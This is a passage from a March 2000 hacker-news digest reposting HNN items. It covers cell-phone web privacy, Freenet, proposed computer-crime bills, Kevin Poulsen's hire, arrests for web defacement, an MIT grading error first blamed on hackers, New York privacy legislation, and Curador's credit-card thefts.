      Bell Atlantic said it does just that. 

      ``We did this intentionally to provide a privacy barrier
      for our customers,'' said Bell Atlantic spokesman Jim
      Gerace. ``What you sacrifice is a little bit of speed,
      but essentially the user doesn't recognize that big a
      difference.'' 

      AirTouch Communications said it drops customers'
      phone numbers altogether, and simply passes along a
      random number to the Web site. 

      In addition to the privacy issues, AirTouch said there
      is another reason to safeguard cell phone users'
      phone numbers. Like many state-of-the-art pagers,
      cell phones with browsers are capable of receiving
      instant text messages called alerts. But if someone
      were able to obtain a list of cell phones with the
      feature, they could potentially blanket them with
      unsolicited ads, similar to junk e-mail and faxes. 

      ``By giving out someone's phone number, you open
      up the door to alert messages,'' said John Rizzo, an
      AirTouch software engineer. Though Rizzo said he
      doesn't believe spammers have started hitting cell
      phones yet, he said ``the potential is there.'' 

      AT&T declined to say whether it automatically gives
      out customers' phone numbers to the Web sites they
      browse. Spokesman Ken Woo would only say that
      ``it's not an issue'' because the company hasn't
      received any complaints. 

      But Manley, the Seattle software developer, said
      customers typically have no way to know when their
      phone numbers are transmitted to Web sites. ``The
      reason nobody (else) complains is because they don't
      realize their privacy is being violated.'' 

      Even so, Manley said he will continue to use his
      Sprint phone to surf the Web. ``It's an annoyance,''
      he said, ``but the convenience of being able to use the
      phone to browse is so much.'' 
      
      2000 San Francisco Chronicle   Page E1 
      
      @HWA
      
138.0 HNN:Mar 8th:Freenet Promises True Free Speech 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Evil Wench 
      Still in beta stages a new network known as Freenet
      hopes to provide even more privacy and anonymity to
      users. Without centralized control Freenet would have
      no IP addresses or DNS making it extremely difficult to
      censor information. With no way to identify users some
      advocates feel that the network would be a haven for
      software and multimedia pirates. 

      Wired
      http://www.wired.com/news/technology/0,1282,34768,00.html
      
      Freenet       
      http://freenet.sourceforge.net
      
      Wired;
      
      Alternative Net Protects Pirates 
      by Leander Kahney 
      
      3:00 a.m. 8.Mar.2000 PST Open-source advocates are developing an alternative 
      publishing network that promises to provide true anonymity in sharing documents 
      and files over the Internet. 
      
      But in addition to protecting free speech, the new system also could be a boon 
      for multimedia pirates. 
      
      Freenet is an open-source file-transfer system similar to the Web for sharing 
      digital content such as HTML pages and MP3 music files. It will be run by 
      connected clusters of servers or node stations that could in turn be run on 
      almost any PC connected to the Internet. 
      
      But unlike the Web, Freenet has no centralized administrative infrastructure of 
      domain name servers (DNS) and IP addresses that can be used to track users. 
      Hosting and replicating documents and files requires that Freenet backers 
      volunteer their time and resources. 
      
      Because Freenet aims to be anonymous, secure, and without centralized control, 
      it would make it almost impossible to trace people who post content -- legal or 
      otherwise -- onto the network. 
      
      "My primary motivation was to make it very difficult to censor information," 
      said Ian Clarke, an Irish programmer who designed the system. "With the Internet 
      there's the potential to censor and monitor people to a degree that's never been 
      possible before. I wanted to develop the technology to make this impossible." 
      
      Clarke started work on Freenet 18 months ago as a graduate student in artificial 
      intelligence at Edinburgh University. 
      
      He had been outraged by the Australian government's proposal to introduce 
      sweeping censorship laws, which went into effect in January. 
      
      Clarke hopes to launch the first public version in the spring, but he said the 
      system is still pretty rough. The server is nearly finished, but so far there 
      are no browsers, or clients, to make the network easy to use. 
      
      Freenet software will be released under the GNU public license, which will allow 
      anyone to freely distribute and change the source code. The system is being 
      written in Java by about a dozen programmers internationally. They have never 
      met nor even spoken over the phone -- all communication is by email, Clarke 
      said. 
      
      Both authors and readers can choose to be anonymous if they so wish, Clarke 
      said. Like the Web, the network is navigated by a client, or browser. 
      
      He said it will even be difficult to determine if someone is running a Freenet 
      server and what information is being stored on it, Clarke said. 
      
      Alex Fowler of the Electronic Frontier Foundation said that while he generally 
      supports anti-censorship tools, Freenet could create as many problems as it 
      solves. 
      
      Fowler said that Freenet could be a useful tool in countries like Singapore or 
      China that censor the Net or quash free speech. But he doesn't like the idea 
      that you wouldn't be able to remove sensitive information -- such as someone's 
      medical records.
      
      "There's no way to tell if a project like this will actually take off," he said. 
      "Its certainly going to raise some questions with a whole lot of people. Not 
      just copyright holders, but governments too." 
      
      Patrick Ball, deputy director of the Science and Human Rights Program with the 
      American Association for the Advancement for Science, said tools like 
      anonymizers, strong cryptography, and Freenet tend not to help activists who are 
      not already under surveillance because using them is in itself suspicious and 
      tends to alert the authorities. 
      
      "Im for any application that protects dissidents," he said. "But theres a 
      higher order problem thats very difficult to get around, and thats by using 
      these tools you draw attention to yourself." 
      
      Although Clarke designed Freenet to protect free speech, he thinks that the 
      safeguards they are building in to make it difficult to track down those who 
      distribute content could lead to its notoriety as a vehicle for copyright 
      piracy. 
      
      The system was designed to make it impossible to find out where files are 
      physically stored. Information posted to the network is stored on multiple 
      servers simultaneously, making it difficult to remove a file. 
      
      In fact, Clarke said any attempt to remove information causes it to be copied to 
      other servers on the network. 
      
      The only way to remove information is to disable the entire network, which may 
      prove difficult if it becomes popular and is running on thousands of PCs all 
      over the globe. 
      
      However, Clarke said the network cannot be guaranteed to permanently store 
      information. Only popular files survive for any period of time. Older, unpopular 
      files would be overwritten by more popular ones. 
      
      "As a project we don't want to be labeled as hackers who distribute warez or 
      copyrighted material," he said. "The purpose of Freenet is to promote freedom of 
      information, but there is an inevitable consequence there that it might lead to 
      violation of copyright law." 
      
      "The potential for protecting freedom of speech is more important than 
      protecting copyright, which is an economic tool," Clarke added. 
      
      Clarke noted that Freenet can be functionally identical to Napster, the wildly 
      popular network for sharing music online. But while the Recording Industry 
      Association of America is currently seeking a court order to shut down Napster's 
      central servers, it would be almost impossible to disable a Freenet network 
      running on machines all over the world. 
      
      "Because it's decentralized no one can be held responsible for it," Clarke said. 
      "Once it's released there's no point coming after me because there's nothing I, 
      nor anyone else, can do to shut it down."
      
      Eric Scheirer, a music technology researcher at MIT's Media Lab, said Freenet is 
      an interesting experiment, but said it would likely be used only by a small 
      community of pirates and "privacy nuts." 
      
      "If it is adopted, it will be adopted by people who want to exchange illegal 
      information and by people who are rabid about privacy and security, which is a 
      relatively small universe," Scheirer said. 
      
      Scheirer pointed out that the Web is trustworthy because of the content on 
      certain domains, and he likes the convenience of tracking devices such as 
      cookies that remember log-in names and passwords. 
      
      "Many of the advantages of Freenet are disadvantages to me," he said. 
      
      Nonetheless, Scheirer said the advent of Freenet and Gnapster, an open-source 
      clone of Napster, illustrated the need for debate about copyright laws in the 
      age of ubiquitous digital distribution channels. 
      
      "There are larger questions about the implications of these technologies," 
      Scheirer said. 

        
       @HWA
       
139.0 HNN:Mar 8th: New Bills Before Congress 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Weld Pond 
      Two new bills are before congress that could have
      serious implications if passed. S2092 would get rid of
      the $5000 in damages limit before the FBI could
      investigate. It also authorizes a roving internet tap as
      well as lowering the age of an adult to 15. (Seems it
      was a problem proving any damages so lets just get rid
      of the limit! But if there are no damages shouldn'9t the
      crimes be treated as trespass which is a minor
      misdemeanor. If this passes someone can report
      someone has broken into their home PC but not
      damaged anything but the FBI has jurisdiction to
      investigate countrywide with a roving internet tap. Like
      they aren't overworked enough already. 

      Federal Register - via Cryptome 
      http://cryptome.org/s2092.txt
      

      S2105 Would make it a crime to tamper with
      identification codes put in place by manufacturers.
      Disabling or changing such codes would be a crime. So
      changing a MAC address or disabling the PIII ID code
      would now be a crime. 

      Federal Register - via Cryptome        
      http://cryptome.org/s2105.txt
      
      @HWA
      
140.0 HNN:Mar 8th:Security Focus Hires Kevin Poulsen 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Aleph One 
      SecurityFocus.com, announced yesterday the addition
      of Kevin Poulsen as the company's editorial director.
      Poulsen has authored a weekly column on computer
      security for ZDTV, covering tech news for ZDNN, and
      contributed free lance articles for Computer Shopper
      and Wired Magazine. Kevin is probably best known for
      his illicit forays into the telephone network which turned
      him into a fugitive who was wanted by the FBI. 

      Security Focus       
      http://www.securityfocus.com/level2/?go=announcements&id=65
      
      Tue Mar 07 2000

      SecurityFocus.com hires Kevin Poulsen as Editorial Director

      SAN MATEO, Calif.--(BUSINESS WIRE)--March 7, 2000-- 

      Poulsen opens Washington D.C. bureau as SecurityFocus.com enhances 
      position to become security industry's leading news watchdog. 

      SecurityFocus.com, the Internet's premier security information portal, 
      announced today the addition of Kevin Poulsen as the company's editorial 
      director, a newly created position. Poulsen's proven industry expertise, 
      and his reputation as a security industry insider, will further advance 
      SecurityFocus.com's reputation as a premier security information source 
      for news-breaking security industry issues and technological developments 
      worldwide. Poulsen's opening of SecurityFocus.com's new Washington D.C. 
      office will strategically place the company in the geographic center of 
      national Internet security policy, legislation, and news. "Kevin brings 
      yet another well-recognized name from the security industry to our staff," 
      said Art Wong, CEO of SecurityFocus.com. "We consider him an industry 
      luminary, especially when you consider that at one time he was one of the 
      first phone and computer hackers to ever be identified and caught. There's 
      no doubt that he brings an `insider's view' to the industry as both a 
      security professional and as a perpetrator. He has proven his journalistic 
      achievements and we expect him to push our growth as a news provider in 
      the information security space." 

      "This is an extraordinary opportunity for me to join a growing niche 
      company where I can marry my years of experience as a journalist with my 
      firsthand knowledge of all sides of the computer security world." said 
      Poulsen. "I plan to lead the charge as we push to expand 
      SecurityFocus.com's growing reputation as one of the leading security 
      information resources on the Internet today. Simply put, I expect 
      SecurityFocus.com to become the first stop for anyone hungry for accurate 
      and timely news on computer security and privacy." 

      About Kevin Poulsen 

      Poulsen brings a range of experience to his new position as editorial 
      director for SecurityFocus.com. He has maintained secure networks at SRI 
      International, a defense contractor, and worked as a network administrator 
      at Sun Microsystems. As a hacker, Poulsen's illicit forays into the 
      telephone network turned him into a fugitive from the FBI, wanted on 
      national security charges that he didn't commit, and featured twice on 
      NBC's Unsolved Mysteries. By 1996, a reformed and penitent Poulsen began 
      building a career as a journalist, authoring a weekly column on computer 
      security for ZDTV, covering tech news for ZDNN, and contributing various 
      high-tech articles to publications like Computer Shopper and Wired 
      Magazine. Poulsen was the first to report on the Y2K survivalist 
      phenomenon, and more recently broke the story for ZDNN on presidential 
      hopeful John McCain's unprecedented use of targeted ad banners in his 
      campaign strategy. 

      Keeping the Internet Secure 

      SecurityFocus.com is the most vital online community available where 
      individuals and corporations can find a range of security information from 
      the industry's leading authorities. With Internet security on the 
      forefront of the minds of eBusinesses and eConsumers alike, 
      SecurityFocus.com delivers 24x7 access to security links and resources 
      that include news, books, mailing lists, tools, products, and security 
      services. In addition, SecurityFocus.com features one of the strongest 
      security advisory collections, including the latest information on system 
      vulnerabilities and available Internet-based solutions. One of 
      SecurityFocus.com's greatest features, Bugtraq, is the industry's most 
      read online security mailing list. The company also hosts forums on 
      security-relevant topics that include Information Warfare, Microsoft 
      Security, Security Incidents, and Executive Security. These forums foster 
      discussions among security professionals and systems managers who are 
      responsible for securing various corporate resources. These forums also 
      feature security vendors and product developers who share their 
      experiences and recommendations on the latest security issues and 
      responses. 

      About SecurityFocus.com 

      San Mateo-based SecurityFocus.com is the leading online news and 
      information resource company designed to facilitate and enhance security 
      awareness from individual users to major corporations. By providing the 
      Internet's largest and most comprehensive database on security 
      intelligence, SecurityFocus.com's staff is committed to stimulating 
      discussion between vendors and users on maintaining a safe and enriching 
      Internet environment. To discover more about SecurityFocus.com, visit 
      www.securityfocus.com . 

      Note to Editors: All names are trademarks or registered trademarks and the 
      property of their respective holders.       Kevin Poulsen may be reached 
      at klp@securityfocus.com

      @HWA
      
141.0 HNN:Mar 9th: Coolio Charged with Web Defacements 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Weld Pond 
      Coolio (Dennis Moran) has been charged by New
      Hampshire officials with two counts of unauthorized
      access to a computer system, for defacing the web
      pages of dare.org. Dare.org is a anti-drug web site set
      up by the Los Angeles Police Department. If convicted
      Coolio could receive 15 years in prison and a $4,000 fine
      for each count. Coolio has also admitted to defacing a
      site run by the U.S. Commerce Department, and a site
      operated by RSA Security Inc. The investigations into
      those defacements is ongoing. Coolio is not considered
      a suspect in the recent DDoS attacks. 

      Digital Mass
      http://www.digitalmass.com/news/daily/03/08/hacker_arrest.html
      
      Attrition.org - Mirrors of Coolio Defacements       
      http://www.attrition.org/mirror/attrition/coolio.html


      Digital Mass;

      N.H. teen hacker 'Coolio' arrested on state hacking charges

      By Associated Press, 03/08/00 

      CONCORD, N.H. - A teen-ager who admitted hacking into several Web sites 
      was charged Wednesday afternoon with defacing an anti-drug site set up by 
      the Los Angeles Police. 

      Dennis Moran, 17, of Wolfeboro, faces two state charges of unauthorized 
      access to a computer system, the attorney general's office said. Each 
      felony is punishable by up to 15 years in prison        and a $4,000 
      fine. Under New Hampshire law, Moran is considered an adult. 

      Moran surrendered at his home and was taken to the Wolfeboro police 
      station, where a bail commissioner released him on $5,000 personal 
      recognizance, said Assistant Attorney General Michael        Delaney. 

      No restrictions on computer use or other special conditions were placed 
      on his bail, Delaney said. 

      The charges were filed in the Southern District Court for Carroll County, 
      Delaney said. No arraignment date has been set. 

      Moran's father, Dennis Moran, when reached by phone at work Wednesday 
      afternoon, was upset that authorities had not notified him his son had 
      been arrested. The teen-ager is the oldest of three        children who 
      all live with their father. 

      "He's only 17, for crying out loud; he's not a killer or anything. I 
      don't believe this,'' he said. 

      The teen-ager was charged with hacking into DARE.com twice last November 
      and defacing it with pro-drug slogans and images, including one depicting 
      the Disney character Donald Duck with a        hypodermic syringe in his 
      arm. 

      Moran, who uses the Internet name "Coolio,'' also admitted in an 
      interview with The Associated Press last week that he had hacked two 
      other sites: a U.S. Commerce Department site that        outlines rules 
      for exporting chemicals that could be used to produce weapons, and a site 
      operated by RSA Security Inc., an Internet security company. 

      "Those investigations are still going on, and there may be additional 
      charges,'' said First Assistant U.S. Attorney David Vicinanzo. 

      Moran also was questioned by the FBI last month about several "denial of 
      service'' attacks on major commercial sites, including Yahoo.com and 
      E-bay.com. 

      He has denied being involved in those attacks, and no charges have been 
      filed in those cases. Although the FBI had said they were seeking someone 
      using the Internet signer "Coolio'' in those        attacks, authorities 
      have also said Coolio - the name of a popular rap singer - is used by 
      many people online. 

      Delaney suggested Moran was unlikely to face charges in the denial of 
      service attacks. 

      "The focus of our investigation at this point is unrelated to distributed 
      denial of service attacks on large Internet company Web sites,'' he said. 


      
      @HWA
      
142.0 HNN:Mar 9th: Grades Altered At MIT By Student 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Weld Pond 
      Twenty-two students of a biology class at the
      Massachusetts Institute of Technology had their grades
      altered by an electronic intruder. Twenty of the
      students where given lower grades while two received
      higher ones. An internal MIT investigation has revealed
      that the culprit did not attend the class but did not say
      if the person was a student at the school or not. MIT
      representatives also said that they are unsure of the
      intruder's means of access but are continuing to
      investigate. 

      Boston Globe       
      http://www.globe.com/dailyglobe2/069/metro/MIT_says_a_hacker_altered_class_grades+.shtml
      
      MIT says a hacker altered class grades 

      By David Abel, Globe Correspondent, 3/9/2000 

          AMBRIDGE - A hacker broke into an MIT computer system and
          altered the grades of 22 students in a biology class, institute officials
      said yesterday.

      The grades of 20 of 120 students in an undergraduate cell biology class were
      lowered, while two others were given higher marks, said officials of the
      Massachusetts Institute of Technology.

      The professor and teaching assistants for the class declined to talk about the
      investigation, but an institute spokesman said officials have identified someone
      from outside the class as the culprit. The spokesman would not say whether
      the person was a student at MIT.

      The grade-tampering scandal has left students uneasy, since the professor,
      Harvey Lodish, announced there had been a cheating incident at the end of
      class last Thursday, pleading for students to come forward if they knew who
      was responsible.

      ''From the beginning, my only hope was that it was someone from outside the
      class,'' sophomore Tara Mullaney, 19, said before a section of the class met
      yesterday. ''Since then, [the professor and teaching assistants] have been
      trying to keep this low.''

      Teaching assistants noticed changes to grades on the class's first exam after
      comparing hard copies with scores recorded on the computer. Believing that
      the school's computer system is secure, professors suspect that the hacker
      filched one of their passwords, students said.

      But Lodish and the teaching assistants were tight-lipped about the breach.

      ''I will not talk with you about this,'' Lodish responded to a Globe query by
      e-mail. ''The situation is being resolved, and all discussions about this issue are
      completely confidential.''

      Ken Campbell, an institute spokesman, said that the person responsible for the
      tampering had been identified and that school officials are investigating the
      person's motive and means of access.

      Some students speculated that the hacker may have intended to set up the
      students whose grades were raised.

      ''They know who they are and why they did it,'' said Alanna Pinkerton, 19, a
      junior in the biology class. ''The professors and the teaching assistants also
      know; everything else is hearsay.''

      The two students whose grades were increased are unlikely to have left
      themselves open to cheating charges, a biology faculty member said.

      ''It just wouldn't be a sensible thing to increase your own grades,'' said Bob
      Sauer, chairman of the biology department. ''But what I've heard is it's
      something far less nefarious.''

      There have been previous incidents of cheating at MIT.

      In 1990, 78 of the 250 undergraduates in an introductory engineering course
      were found to have turned in identical computer codes on a homework
      assignment.

      Many of those students said cheating was rampant at MIT. A study a year
      later found that 83 percent of MIT students admitted to cheating on homework
      at least once during the 1991-92 school year.

      In that survey, nearly half of all students admitted stealing other people's
      phraseology, ideas, or arguments. About 40 percent said they had
      misrepresented or fudged data in a lab report or research paper, and about
      one-fifth said they had copied from another person's paper or published work
      without acknowledgment.

      Still, the consequences for cheating at MIT are grave. If the hacker
      responsible for tampering with the grades in the cell biology class is a student,
      then he or she could face expulsion, institute officials said.

      This story ran on page A01 of the Boston Globe on 3/9/2000. 
       Copyright 2000 Globe Newspaper Company. 
      
      @HWA
      
143.0 HNN:Mar 9th: Lloyd's Defacer Arrested and Released 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Simple Nomad and Lady Sharrow 
      An unidentified man has been arrested and released on
      bail for defacing the web sites of Lloyds' of London and
      Railtrack earlier this year. He has been charged under
      sections one and three of the Computer Misuse Act
      regarding unauthorized access and the modification of
      computer systems. He was arrested by officers from
      Scotland Yard's Computer Crime Unit. 

      The Register UK       
      http://www.theregister.co.uk/000308-000020.html
      
      Posted 08/03/2000 4:04pm by Tim Richardson

      Railtrack hacker arrested

      A man has been released on police bail after being arrested in connection
      with the hack attacks that paralysed the Web sites of Lloyds of London and
      Railtrack at the beginning of the year. 

      The man was arrested on Friday and but has to report back to police in 
      June pending further enquiries. 

      The alleged offences come under sections one and three of the Computer
      Misuse Act regarding unauthorised access and the modification of computer
      systems. He was arrested by officers from Scotland Yard's Computer Crime 
      Unit. 

      The identity of the man was not released. 

      Earlier this year The Register carried an exclusive interview with a 
      member of the group which claimed responsibility for hacking into the
      Lloyds of London Web site. 

      "MisterX", as he called himself, also claimed that credit card 
      transactions across the Internet were unsafe, and that he was able to 
      hoover-up confidential data from Web sites.  
      
      @HWA
      
144.0 HNN:Mar 9th:Cross Green Market Raided 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Apocalyse Dow 
      30 police officers and 19 industry investigators raided
      Cross Green Market in Leeds England and seized over
      500,000 of pirated software. The software included
      office applications, games and DVDs. Investigators from
      the European Leisure Software Publishers Association
      (ELSPA), Mechanical Copyright Protection Society
      (MCPS), Microsoft, Nintendo and Sony where involved in
      the raid. 

      Silicon.com - If Anyone has a better link please submit
      it. This lame site won't let you link directly to the story.       
      http://www.silicon.com/bin/bladerunner?REQUNIQ=952539836&30REQEVENT=&REQAUTH=21046
      
            
      @HWA
      
145.0 HNN:Mar 9th:AT+T Sends Private Info of Cell Surfers 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      From HNN http://www.hackernews.com/
     
      Contributed by Simple Nomad 
      AT+T has confirmed that it sends the private phone
      number of its cell phone subscribers along with each
      web page request when those users are surfing via their
      cell phone. Yesterday HNN mentioned that SprintPCS did
      this as well, they have since said that they intend to
      change their policy of transmitting customers' phone
      numbers to Web sites. 

      San Francisco Chronicle       
      http://199.97.97.16/contWriter/cnd7/2000/03/08/cndin/0305-0002-pat_nytimes.html
      
      Hot Topics 
      Sprint to Hide Web Surfers' Phone Numbers 
      TODD WALLACK 
      c.2000 San Francisco Chronicle 


      After taking heat from privacy advocates, Sprint PCS said Tuesday it plans 
      to change its policy of transmitting customers' phone numbers to Web sites 
      they access with their cell phones. 

      But a second company, AT&T, confirmed that it, too, automatically sends 
      customers' phone numbers to Web sites through its wireless data service. 
      The phone numbers are embedded in every request for a Web page. 

      Privacy watchdogs complained the practice makes it too easy for Web sites 
      to forward the phone numbers to their sales department for follow-up 
      calls. Moreover, Web site operators could potentially use databases to 
      match the phone numbers with users' real names and other personal 
      information. 

      At least one analyst said the practice could hurt AT&T's and Sprint's 
      fledgling efforts to persuade customers to use their cell phone services 
      to access the Web. 

      ``Personal privacy is paramount,'' said Ken Dulaney, a San Jose analyst 
      with the Gartner Group. ``If that isn't one of the first concerns of any 
      business, it is likely the business is not going to do well in the long 
      run.'' 

      Only about 50,000 people in the United States now use cell phones to 
      access the Web, Dulaney said, but experts expect millions to do so in 
      coming years, making it an important market. 

      Sprint said it will let customers decide whether to give out their phone 
      number in the next version of its wireless Web service, scheduled to be 
      rolled out in April or May. If users don't make a choice, Sprint will 
      automatically send Web sites a ``bogus number'' as their user ID. 

      Sprint, though, denied it was making the change because of complaints by 
      consumers' and privacy advocates. A Sprint executive said the new product 
      has been in the works for more than a year. 

      ``We have always been focused on customers' privacy,'' said Keith 
      Paglusch, PCS senior vice president for operations. 

      Paglusch said he didn't realize any customers were upset about the current 
      practice until The Chronicle published a story about the issue in 
      Tuesday's paper. 

      He said it was ``a nonissue'' in focus groups. And a Sprint spokesman 
      pointed out that it has agreements with a dozen partners featured on the 
      cell phone screen that bar them from using the phone number for 
      telemarketing or other purposes. 

      AT&T spokesman Ken Woo also brushed aside privacy worries. Woo said the
      phone company hasn't received any gripes from customers about the practice,
      which it first publicly disclosed Tuesday. Woo also declined to say whether
      the company is considering changing the policy. 

      ----- 

      (The San Francisco Chronicle Web site is at http://www.sfgate.com) 
      
      
      Addendum:
      
      Cell Phone Surfers Web Privacy 


      contributed by Space Rogue 
      Yesterday HNN linked to a story in the San Francisco
      Chronicle that blamed AT+T for sending subscribers cell
      phone numbers along with web requests when users
      surfed with their phones. We received an email,
      apparently from an AT+T technician, refuting that
      article. He said "Our (AT+T) web-accessible phones do
      not use the cellular network at all to surf the web. Our
      phones use CDPD--an IP-based protocol having nothing
      to do with cellular. Each IP is a real Internet routable IP
      that is assigned the same as any CDPD
      modem--orthogonal to the cellular phone provisioning.
      Many current PocketNet phones don't even have voice
      service (data only) so they can't even send a MIN!" 
      
      @HWA

      
146.0 HNN:Mar 10th: MIT Blames Cyber Vandals For Sorting Error 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Dave Sjerven 
      When a computerized grading system failed to report
      the proper grades for a cell biology class at the
      Massachusetts Institute of Technology officials
      immediately concluded that it must have been the work
      of electronic intruders. After a thorough investigation
      MIT discovered that in fact the changed grades were
      due to a spreadsheet sorting error. (The simplest
      answer is usually the correct one.) 

      MIT
      http://web.mit.edu/newsoffice/nr/2000/grades.html
      
      ComputerWorld
      http://www.computerworld.com/home/print.nsf/all/000309F556
      
      Boston Herald
      http://www.bostonherald.com/bostonherald/lonw/error03092000.htm
      
      Boston Globe (It was on the front page of the Globe
      yesterday, today it made it to B3) 
      http://www.boston.com/dailyglobe2/070/metro/MIT_grade_changes_tied_to_teaching_assistant_s_error+.shtml
      
      MIT
      
      
      Grade changes at MIT caused by slip-up
      in spreadsheet sorting of names and grades                                                                                                                                                                                      MARCH 9, 2000
                                                                                                                                                                                     

      An incident of grade-changing on an MIT computer -- investigated as a
      computer hacking incident -- has turned out to be a simple slip-up in
      the computerized sorting of names and grades on a spreadsheet.

      Professor Harvey Lodish this morning informed an MIT spokesman that the 
      mystery was solved. He said the changes were made by mistake by a person
      authorized to enter grades. The professor declined to identify the person.

      The sorting of a grades spreadsheet is done by using a computer mouse to
      highlight the two columns of names and corresponding grades. In this case,
      there was a slip-up in the use of the mouse and only the column of names 
      was sorted, resulting in grades being assigned to the wrong people. The 
      error raised the grades of two students and lowered the grades of 20 students.
      
      -=-
      
      Nuff'said on this one.. - Ed ROFL
      
      @HWA
      
147.0 HNN:Mar 10th:NY Wants Privacy for Consumers 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Evil Wench 
      The New York State Senate on Wednesday unveiled a
      package of new legislation to protect the privacy of
      consumers, drivers, and patients that would place new
      restrictions on credit agencies, schools, telemarketers,
      hospitals, pharmacies, and other organizations that
      gather and use personal information. "Our
      recommendations were guided by a belief that
      individuals have a basic right to know who is collecting
      personal information, how it is being used and whether
      that information is shared or sold without their
      knowledge or approval," said Senate Majority Leader
      Joseph Bruno. (Damn. Makes me want to move to New
      York just so I can vote for this guy.) 

      Reuters - via TechWeb
      http://www.techweb.com/wire/story/reuters/REU20000308S0010      
      
      NY Senate Seeks Internet Privacy
      Laws
      (03/08/00, 6:05 p.m. ET)
      By Reuters 

      NEW YORK (Reuters) -- The New York State
      Senate, addressing a growing controversy
      about how Internet companies gather and use
      information about customers, Wednesday
      unveiled a package of new legislation to
      protect the privacy of consumers, drivers, and
      patients. 

      The proposals came after online advertising company
      DoubleClick made headlines last week, backing down on
      a plan to identify anonymous Web surfers. Privacy
      advocates have fiercely objected to plans under which
      companies collect and share information that identifies
      individuals, as opposed to data on demographic groups. 

      But the senate did not limit its reach to just Internet data.
      The legislation also contains new restrictions on credit
      agencies, schools, telemarketers, hospitals, pharmacies,
      and other organizations that gather and use personal
      information. 

      The legislation would also protect people who use
      financial services, including those offered by major banks
      headquartered in New York City. 

      One proposal would bar businesses, schools, and other
      outfits from sharing or selling Social Security numbers.
      What the senate called surreptitious video surveillance in
      a private dwelling without consent would also become a
      new crime. 

      "Our recommendations were guided by a belief that
      individuals have a basic right to know who is collecting
      personal information, how it is being used and whether
      that information is shared or sold without their knowledge
      or approval," Senate Majority Leader Joseph Bruno (R),
      said in prepared remarks. 

      Identity theft is one of the fastest-growing crimes in the
      nation, claiming about 400,000 victims a year, the senate
      said in written remarks. To combat this type of crime, the
      senate said it would advance legislation making it a crime
      to knowingly obtain personal information with the intent
      to use the data to get goods or services in another
      person's name. 

      Patients' privacy also would be protected: pharmacies,
      hospitals and other health care providers would be barred
      from sharing or selling what the senate called personally
      identifying medical or health data for any purpose not
      directly related to the person's treatment. 

      The only exception would be for federal or state
      reporting requirements. 

      The senate also would apply stiff rules for telemarketers,
      barring them from accessing customers' checking,
      savings, and other accounts without approval. 

      The sale of drivers' Motor Vehicle registration and title
      information also would be prohibited. 

      And prisoners, some of whom do contract work on
      computers, would be prohibited from tapping into
      personal information. 

      In addition, schools and colleges would only be able to
      use their students' Social Security numbers for
      identification. 

      The senate also would apply new laws to credit agencies,
      banning them from selling consumers' credit card
      numbers for unauthorized purposes. It estimated the
      three largest agencies have records on 160 million
      individuals, including birth dates, addresses, phone
      numbers, Social Security numbers, job and salary history,
      credit transactions, and more. 

      While the federal Fair Credit and Reporting Act puts
      limits on an agency's ability to share or sell information in
      people's credit reports, the credit agencies often get
      around that by selling basic data, such as Social Security
      number, age, phone and address, the senate said. 

      A senate task force studied the privacy issue for about a
      year, and the Republican-led body next week expects to
      start approving its new legislation. Not to be outdone, the
      Democrat-controlled Assembly said it would hold two
      hearings in March on consumer privacy. 

      Saluting Chase Manhattan for no longer giving outside
      marketers their customers' personal and financial
      information without consent, the senate called on all
      financial institutions to follow the same standard. 
      
      @HWA
      
148.0 HNN:Mar 10th:Curador Taunts Police 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by William Knowles 
      "Law enforcement couldn't hack their way out of a wet
      paper bag. They're people who get paid to do nothing.
      They never actually catch anybody," said Curador to an
      Internet News reporter. Curador has made a practice of
      breaking into e-commerce sites, grabbing their customer
      database and then posting the numbers online. So far
      he claims to have gotten into eight systems and has
      posted thousands of valid numbers to his web site. His
      previous web sites at e-crackerce.com and
      free-creditcard.com, which themselves where registered
      with fraudulent cards, have been shut down. Curador
      has said that he will publicize his newest site with a
      banner on the Microsoft Banner Network. Curador's first
      cyber break in occurred back in January. 

      Internet News 
      http://www.internetnews.com/ec-news/article/0,1087,4_318381,00.html
      
      E-Commerce News 

      Curador Taunts Police Over Site Break-Ins March 9, 2000 By Brian 
      McWilliams InternetNews.com Correspondent E-Commerce News Archives 


      Curador, the cracker who has stolen credit cards from at least eight small 
      e-commerce sites and then posted them online, is growing more brazen by 
      the minute. 

      In an interview with InternetNews Wednesday, Curador claimed he has hit 
      five new Web firms and will soon publish hundreds more stolen credit card 
      numbers at a new site, which he said he registered using one of the stolen 
      cards. 

      "Law enforcement couldn't hack their way out of a wet paper bag. They're 
      people who get paid to do nothing. They never actually catch anybody," 
      said Curador. 

      After hitting his first site, Shopping Thailand, on Jan. 31, Curador has 
      so far eluded arrest. In February, Curador stole and posted credit cards 
      from mobile phone provider ProMobility, LTAmedia, a self-improvement 
      products site, and the homepage of the American Society of Clinical 
      Pathologists. Curador's most recent victims include NTD, a Web development 
      firm in the U.K., Vision Computers, a computer retailer, as well as Sales 
      Gate, an ecommerce portal, and online herbalist Feelgood Falls. 

      Using a stolen card, Curador set up a site at e-crackerce.com in late 
      February where he posted several thousand of the purloined card numbers. 
      That site was soon shut down by the hosting company. A few days ago, 
      Curador re-emerged at free-creditcard.com, also apparently registered 
